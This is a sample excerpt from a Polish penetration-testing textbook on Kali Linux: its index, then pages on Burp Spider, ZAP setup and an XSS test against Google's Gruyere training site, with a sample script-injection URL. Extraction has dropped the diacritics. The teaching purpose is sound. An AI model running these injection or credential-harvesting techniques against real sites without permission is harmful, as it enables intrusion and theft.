ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 20: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

